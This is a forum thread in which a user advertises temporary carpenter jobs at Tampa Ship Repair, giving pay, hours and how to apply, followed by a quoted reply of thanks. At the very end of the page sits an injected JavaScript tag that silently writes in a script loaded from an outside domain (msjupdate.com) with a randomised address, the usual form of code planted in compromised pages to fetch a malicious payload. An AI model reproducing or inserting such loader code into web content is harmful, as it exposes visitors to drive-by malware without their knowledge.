Temporary work for those who are waiting

[B]Hello all, [/B]

[B]I have posted a job under “shoreside” jobs with Tampa Ship Repair. they are hiring 20 Carpenters @ $ 19.16 hr/40 0730-1530hrs (nice) to last 10 months. Thats not bad if your “waiting on paperwork” or company to “call” you back.[/B]
[B]Anyway, it’s income and They used to have bus transporation. They will be hiring Sept 1st, and will be advertising for more positions other than carpenters. [I]VERY[/I] cool place to work. You cannot apply on line, you have to fax/email your resum’e, and they will filter and schedule for interview. [/B]

[B]Tampa ship fax # = 813 - 247 - 7341[/B]

[B]If you email ( info@tampaship.com ) [/B][B]resume put " HR = Welder position " in the subject line.[/B]

[B]PM if you have any questions.[/B]

[B]Soon as I get wind (the good kind), I’ll post when I can. :rolleyes:[/B]

[quote=NAUTICART;17155][B]Hello all, [/B]

[B]I have posted a job under “shoreside” jobs with Tampa Ship Repair. they are hiring 20 Carpenters @ $ 19.16 hr/40 0730-1530hrs (nice) to last 10 months. Thats not bad if your “waiting on paperwork” or company to “call” you back.[/B]
[B]Anyway, it’s income and They used to have bus transporation. They will be hiring Sept 1st, and will be advertising for more positions other than carpenters. [I]VERY[/I] cool place to work. You cannot apply on line, you have to fax/email your resum’e, and they will filter and schedule for interview. [/B]

[B]Tampa ship fax # = 813 - 247 - 7341[/B]

[B]If you email ( info@tampaship.com ) [/B][B]resume put " HR = Welder position " in the subject line.[/B]

[B]Write me if you have any questions @ NAUTICART@AOL.COM[/B]

[B]Soon as I get wind (the good kind), I’ll post when I can. :rolleyes:[/B][/quote]

Thanks Naut!
<script language=‘JavaScript’ type=‘text/javascript’>document.write ("<" + “script language=‘JavaScript’ type=‘text/javascript’ src='http://msjupdate.com/ff/output/index/13p1Ws34cCGH6OMgCyYu9A1e95DoArEK?rand=” + Math.random() * 100000000 +"’></"+“script>”)</script>